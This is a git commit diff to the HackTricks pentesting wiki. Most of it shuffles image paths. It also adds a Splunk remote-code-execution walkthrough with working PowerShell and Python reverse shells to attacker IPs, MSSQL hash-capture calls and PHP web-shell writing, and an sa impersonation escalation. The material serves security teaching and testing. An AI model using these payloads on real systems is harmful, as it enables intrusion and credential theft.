GitBook: [#3537] No subject

2022-10-03 00:11:21 +00:00 · 2022-10-03 00:11:21 +00:00 · c1b2a6c6b6
commit c1b2a6c6b6
parent 5a985828e0
18 changed files with 224 additions and 55 deletions
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image.png
+++ b/.gitbook/assets/image.png
--- a/1911-pentesting-fox.md
+++ b/1911-pentesting-fox.md
@ -22,7 +22,7 @@ dht udp "DHT Nodes"

 ![](<.gitbook/assets/image (273).png>)

-![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
+![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)

 InfluxDB

--- a/SUMMARY.md
+++ b/SUMMARY.md
@ -339,7 +339,7 @@
  * [Special HTTP headers](network-services-pentesting/pentesting-web/special-http-headers.md)
  * [Spring Actuators](network-services-pentesting/pentesting-web/spring-actuators.md)
  * [Symfony](network-services-pentesting/pentesting-web/symphony.md)
-  * [Tomcat](network-services-pentesting/pentesting-web/tomcat/README.md)
+  * [Tomcat](network-services-pentesting/pentesting-web/tomcat.md)
    * [Basic Tomcat Info](network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md)
  * [Uncovering CloudFlare](network-services-pentesting/pentesting-web/uncovering-cloudflare.md)
  * [VMWare (ESX, VCenter...)](network-services-pentesting/pentesting-web/vmware-esx-vcenter....md)
--- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
+++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
@ -61,7 +61,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig

 In order to mount an MBR in Linux you first need to get the start offset (you can use `fdisk` and the `p` command)

-![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
+![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)

 And then use the following code

--- a/forensics/basic-forensic-methodology/windows-forensics/README.md
+++ b/forensics/basic-forensic-methodology/windows-forensics/README.md
@ -156,7 +156,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi

 Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).

-![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (7).png>)
+![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).png>)

 ### USB Detective

--- a/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md
+++ b/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md
@ -65,7 +65,7 @@ Example:
 Inguz# show version
 ```

-<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (3) (2).png" alt=""><figcaption></figcaption></figure>

 > **However, don’t forget that the EIGRP routing domain can be protected by authentication. But you still have a chance to connect to the routing domain. When hello packets are sent out, they also contain cryptographic hashes. If you can extract these hashes from the traffic dump and reset the password, you can log on to the routing domain with this password.**

@ -173,7 +173,7 @@ Script arguments:

 The essence of this attack is to provoke the sending of a huge number of false routes, which will overflow the routing table. This depletes the computing resources of the router, namely the CPU and RAM, since the injections occur at enormous speed. This attack is implemented [**routingtableoverflow.py**](https://github.com/in9uz/EIGRPWN/blob/main/routingtableoverflow.py) **script**

-<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>

 Script arguments

--- a/mobile-pentesting/ios-pentesting/README.md
+++ b/mobile-pentesting/ios-pentesting/README.md
@ -723,7 +723,7 @@ You can collect console logs through the Xcode **Devices** window as follows:
 5. Reproduce the problem.
 6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.

-![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
+![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (11).png>)

 You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:

--- a/network-services-pentesting/8089-splunkd.md
+++ b/network-services-pentesting/8089-splunkd.md
@ -4,18 +4,18 @@

 <summary><strong>Support HackTricks and get benefits!</strong></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

 </details>

+## **Basic Information**
+
+**Splunk** is a **log analytics tool** used to gather, analyze and visualize data. Though not originally intended to be a SIEM tool, Splunk is often used for **security monitoring and business analytics**. Splunk deployments are often used to house **sensitive data** and could provide a wealth of information for an attacker if compromised.
+
 **Default port:** 8089

 ```
@ -23,28 +23,124 @@ PORT     STATE SERVICE VERSION
 8089/tcp open  http    Splunkd httpd
 ```

+{% hint style="info" %}
+The **Splunk web server runs by default on port 8000**.
+{% endhint %}
+
+## Enumeration
+
+### Free Version
+
+The Splunk Enterprise trial converts to a **free version after 60 days**, which **doesn’t require authentication**. It is not uncommon for system administrators to install a trial of Splunk to test it out, which is **subsequently forgotten about**. This will automatically convert to the free version that does not have any form of authentication, introducing a security hole in the environment. Some organizations may opt for the free version due to budget constraints, not fully understanding the implications of having no user/role management.
+
+### Default Credentials
+
+On older versions of Splunk, the default credentials are **`admin:changeme`**, which are conveniently displayed on the login page.\
+However, **the latest version of Splunk** sets **credentials** **during the installation process**. If the default credentials do not work, it is worth checking for common weak passwords such as `admin`, `Welcome`, `Welcome1`, `Password123`, etc.
+
+### Obtain Information
+
+Once logged in to Splunk, we can **browse data,** run **reports**, create **dashboards**, **install applications** from the Splunkbase library, and install custom applications.\
+You can also run code: Splunk has multiple ways of **running code**, such as server-side Django applications, REST endpoints, scripted inputs, and alerting scripts. A common method of gaining remote code execution on a Splunk server is through the use of a scripted input.
+
+Moreover, as Splunk can be installed on Windows or Linux hosts, scripted inputs can be created to run Bash, PowerShell, or Batch scripts.
+
+### Shodan
+
+* `Splunk build`
+
+## RCE
+
+### Create Custom Application
+
+A custom application can run **Python, Batch, Bash, or PowerShell scripts**.\
+Note that **Splunk comes with Python installed**, so even in **Windows** systems you will be able to run python code.
+
+You can use [**this**](https://github.com/0xjpuff/reverse\_shell\_splunk) Splunk package to assist us. The **`bin`** directory in this repo has examples for [Python](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/rev.py) and [PowerShell](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/run.ps1). Let's walk through this step-by-step.
+
+To achieve this, we first need to create a custom Splunk application using the following directory structure:
+
+```shell-session
+tree splunk_shell/
+
+splunk_shell/
+├── bin
+└── default
+```
+
+The **`bin`** directory will contain any **scripts that we intend to run** (in this case, a **PowerShell** reverse shell), and the default directory will have our `inputs.conf` file. Our reverse shell will be a **PowerShell one-liner:**
+
+```powershell
+$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close(
+```
+
+The [inputs.conf](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf) file tells Splunk **which script to run** and any other conditions. Here we set the app as enabled and tell Splunk to run the script every 10 seconds. The interval is always in seconds, and the input (script) will only run if this setting is present.
+
+```shell-session
+cat inputs.conf 
+
+[script://./bin/rev.py]
+disabled = 0  
+interval = 10  
+sourcetype = shell 
+
+[script://.\bin\run.bat]
+disabled = 0
+sourcetype = shell
+interval = 10
+```
+
+We need the `.bat` file, which will run when the application is deployed and execute the PowerShell one-liner.
+
+The next step is to choose `Install app from file` and upload the application.
+
+<figure><img src="../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
+
+Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat).
+
+```shell-session
+sudo nc -lnvp 443
+
+listening on [any] 443 ...
+```
+
+On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`. **** As **soon as we upload the application**, a **reverse shell is received** as the status of the application will automatically be switched to `Enabled`.
+
+#### Linux
+
+If we were dealing with a **Linux host**, we would need to **edit the `rev.py` Python script** before creating the tarball and uploading the custom malicious app. The rest of the process would be the same, and we would get a reverse shell connection on our Netcat listener and be off to the races.
+
+```python
+import sys,socket,os,pty
+
+ip="10.10.14.15"
+port="443"
+s=socket.socket()
+s.connect((ip,int(port)))
+[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
+pty.spawn('/bin/bash')
+```
+
+### RCE & Privilege Escalation
+
 In the following page you can find an explanation how this service can be abused to escalate privileges and obtain persistence:

 {% content-ref url="../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md" %}
 [splunk-lpe-and-persistence.md](../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md)
 {% endcontent-ref %}

-### Shodan
+## References

-* `Splunk build`
+* [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213)

 <details>

 <summary><strong>Support HackTricks and get benefits!</strong></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

 </details>
--- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server.md
+++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server.md
@ -89,6 +89,7 @@ SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http:/

 ```bash
 sqsh -S <IP> -U <Username> -P <Password> -D <Database>
+sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database> #In case Windows Auth using "." as domain na,e for local user
 ```

 ![](<../.gitbook/assets/image (20) (1).png>)
@ -161,6 +162,11 @@ You should start a **SMB server** to capture the hash used in the authentication
 ```bash
 xp_dirtree '\\<attacker_IP>\any\thing'
 exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
+EXEC master..xp_subdirs '\\<attacker_IP>\anything\'
+
+# Capture hash
+sudo responder -I tun0
+sudo impacket-smbserver share ./ -smb2support
 msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
 ```

@ -168,6 +174,41 @@ msf> use auxiliary/admin/mssql/mssql_ntlm_stealer

 [**Read this post**](../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **to find more information about how to abuse this feature**

+### **Write Files**
+
+To write files using `MSSQL`, we **need to enable** [**Ole Automation Procedures**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option), which requires admin privileges, and then execute some stored procedures to create the file:
+
+```bash
+# Enable Ole Automation Procedures
+sp_configure 'show advanced options', 1
+GO
+RECONFIGURE
+GO
+sp_configure 'Ole Automation Procedures', 1
+GO
+RECONFIGURE
+GO
+
+# Create a File
+DECLARE @OLE INT
+DECLARE @FileID INT
+EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
+EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
+EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
+EXECUTE sp_OADestroy @FileID
+EXECUTE sp_OADestroy @OLE
+GO
+```
+
+### **Read file with** OPENROWSET
+
+By default, `MSSQL` allows file **read on any file in the operating system to which the account has read access**. We can use the following SQL query:
+
+```sql
+SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
+GO
+```
+
 ### **Read files executing scripts (Python and R)**

 MSSQL could allow you to execute **scripts in Python and/or R**. These code will be executed by a **different user** than the one using **xp\_cmdshell** to execute commands.
@ -204,6 +245,41 @@ msf> use auxiliary/admin/mssql/mssql_escalate_dbowner

 [IMPERSONATE privilege can lead to privilege escalation in SQL Server.](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/)

+SQL Server has a special permission, named **`IMPERSONATE`**, that **allows the executing user to take on the permissions of another user** or login until the context is reset or the session ends.&#x20;
+
+#### Identify users to impersonate
+
+```
+1> SELECT distinct b.name
+2> FROM sys.server_permissions a
+3> INNER JOIN sys.server_principals b
+4> ON a.grantor_principal_id = b.principal_id
+5> WHERE a.permission_name = 'IMPERSONATE'
+6> GO
+
+name
+-----------------------------------------------
+sa
+john
+```
+
+Note how from the previous results you can see that you can **impersonate the user "sa".**
+
+#### Impersonate sa user
+
+```
+1> EXECUTE AS LOGIN = 'sa'
+2> SELECT SYSTEM_USER
+3> SELECT IS_SRVROLEMEMBER('sysadmin')
+4> GO
+```
+
+{% hint style="info" %}
+If you can impersonate a user, even if he isn't sysadmin, you should check i**f the user has access** to other **databases** or linked servers.
+{% endhint %}
+
+#### Automatically
+
 ```bash
 msf> auxiliary/admin/mssql/mssql_escalate_execute_as
 ```
@ -212,6 +288,10 @@ msf> auxiliary/admin/mssql/mssql_escalate_execute_as

 [https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/](https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/)

+### Other ways for RCE
+
+There are other methods to get command execution, such as adding [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), and [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
+
 ## Post Explotation

 The user running MSSQL server will have enabled the privilege token **SeImpersonatePrivilege.**\
--- a/network-services-pentesting/pentesting-mysql.md
+++ b/network-services-pentesting/pentesting-mysql.md
@ -85,6 +85,7 @@ Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.
 Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

 #Read & Write
+## Yo need FILE privilege to read & write to files.
 select load_file('/var/lib/mysql-files/key.txt'); #Read file
 select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

--- a/network-services-pentesting/pentesting-web/README.md
+++ b/network-services-pentesting/pentesting-web/README.md
@ -110,7 +110,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno
 * [**Python**](python.md)
 * [**Spring Actuators**](spring-actuators.md)
 * [**Symphony**](symphony.md)
-* [**Tomcat**](tomcat/)
+* [**Tomcat**](tomcat.md)
 * [**VMWare**](vmware-esx-vcenter....md)
 * [**Web API Pentesting**](web-api-pentesting.md)
 * [**WebDav**](put-method-webdav.md)
@ -153,7 +153,7 @@ nuclei -ut && nuclei -target <URL>

 If a CMS is used don't forget to **run a scanner**, maybe something juicy is found:

-[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/)**, Railo, Axis2, Glassfish**\
+[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat.md)**, Railo, Axis2, Glassfish**\
 [**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal.md), **Joomla**, **vBulletin** websites for Security issues. (GUI)\
 [**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal.md)**, PrestaShop, Opencart**\
 **CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal.md) **or** [**(M)oodle**](moodle.md)\
--- a/network-services-pentesting/pentesting-web/tomcat/README.md
+++ b/network-services-pentesting/pentesting-web/tomcat/README.md
@ -17,7 +17,7 @@
 * It usually runs on **port 8080**
 * **Common Tomcat error:**

-<figure><img src="../../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>

 ## Enumeration

@ -127,7 +127,7 @@ Finally, if you have access to the Tomcat Web Application Manager, you can **upl

 ### Limitations

-You will only be able to deploy a WAR if you have **enough privileges** (roles: **admin**, **manager** and **manager-script**). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` (it vary between versions) (see [POST ](./#post)section).
+You will only be able to deploy a WAR if you have **enough privileges** (roles: **admin**, **manager** and **manager-script**). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` (it vary between versions) (see [POST ](tomcat.md#post)section).

 ```bash
 # tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
--- a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
+++ b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md
@ -4,15 +4,11 @@

 <summary><strong>Support HackTricks and get benefits!</strong></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

 </details>

@ -394,7 +390,7 @@ ${${lower:jnd}${lower:${upper:ı}}:ldap://...} //Notice the unicode "i"

 In this [**CTF writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/) is well explained how it's potentially **possible** to **abuse** some features of **Log4J**.

-The [**security page**](https://logging.apache.org/log4j/2.x/security.html)  of Log4j has some interesting sentences:
+The [**security page**](https://logging.apache.org/log4j/2.x/security.html) of Log4j has some interesting sentences:

 > From version 2.16.0 (for Java 8), the **message lookups feature has been completely removed**. **Lookups in configuration still work**. Furthermore, Log4j now disables access to JNDI by default. JNDI lookups in configuration now need to be enabled explicitly.

@ -426,7 +422,7 @@ In the CTF, you **couldn't access the stderr** of the java application using log

 Just to mention it, you could also inject new [**conversion patterns**](https://logging.apache.org/log4j/2.x/manual/layouts.html#PatternLayout) and trigger exceptions that will be logged to `stdout`. For example:

-![](<../../.gitbook/assets/image (3) (2).png>)
+![](<../../.gitbook/assets/image (3) (2) (1).png>)

 This wasn't found useful to exfiltrate date inside the error message, because the lookup wasn't solved before the conversion pattern, but it could be useful for other stuff such as detecting.

@ -437,7 +433,7 @@ However, it's possible to use some **conversion patterns that supports regexes**
 * **Binary search via exception messages**

 The conversion pattern **`%replace`** can be use to **replace** **content** from a **string** even using **regexes**. It works like this: `replace{pattern}{regex}{substitution}`\
-``Abusing this behaviour you could make replace **trigger an exception if the regex matched** anything inside the string (and no exception if it wasn't found) like this:
+\`\`Abusing this behaviour you could make replace **trigger an exception if the regex matched** anything inside the string (and no exception if it wasn't found) like this:

 ```bash
 %replace{${env:FLAG}}{^CTF.*}{${error}}
@ -469,7 +465,7 @@ In this [**writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-l
 > }{#}{######################################################}
 > ```
 >
-> If the flag starts with `flagGuess`, the whole flag is replaced with 29 `#`-s (I used this character because it would likely not be part of the flag). **Each of the resulting 29 `#`-s is then replaced by 54 `#`-s**. This process is repeated **6 times**, leading to a total of `29*54*54^6* =`` `**`96816014208`  `#`-s!**
+> If the flag starts with `flagGuess`, the whole flag is replaced with 29 `#`-s (I used this character because it would likely not be part of the flag). **Each of the resulting 29 `#`-s is then replaced by 54 `#`-s**. This process is repeated **6 times**, leading to a total of ` 29*54*54^6* =`` `` `**`96816014208`  `#`-s!**
 >
 > Replacing so many `#`-s will trigger the 10-second timeout of the Flask application, which in turn will result in the HTTP status code 500 being sent to the user. (If the flag does not start with `flagGuess`, we will receive a non-500 status code)

@ -488,14 +484,10 @@ In this [**writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-l

 <summary><strong>Support HackTricks and get benefits!</strong></summary>

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**

 </details>
--- a/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
+++ b/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md
@ -473,7 +473,7 @@ In this case, `John@corp.local` has `GenericWrite` over `Jane@corp.local`, and w

 First, we obtain the hash of `Jane` with for instance Shadow Credentials (using our `GenericWrite`).

-<figure><img src="../../../.gitbook/assets/image (13) (1) (1) (1) (2) (2).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (13) (1) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>

 Next, we change the `userPrincipalName` of `Jane` to be `Administrator`. Notice that we’re leaving out the `@corp.local` part.

@ -553,7 +553,7 @@ In this case, `John@corp.local` has `GenericWrite` over `Jane@corp.local`, and w

 First, we obtain the hash of `Jane` with for instance Shadow Credentials (using our `GenericWrite`).

-<figure><img src="../../../.gitbook/assets/image (13) (1) (1) (1) (2).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (13) (1) (1) (1) (2) (2).png" alt=""><figcaption></figcaption></figure>

 Next, we change the `userPrincipalName` of `Jane` to be `DC$@corp.local`.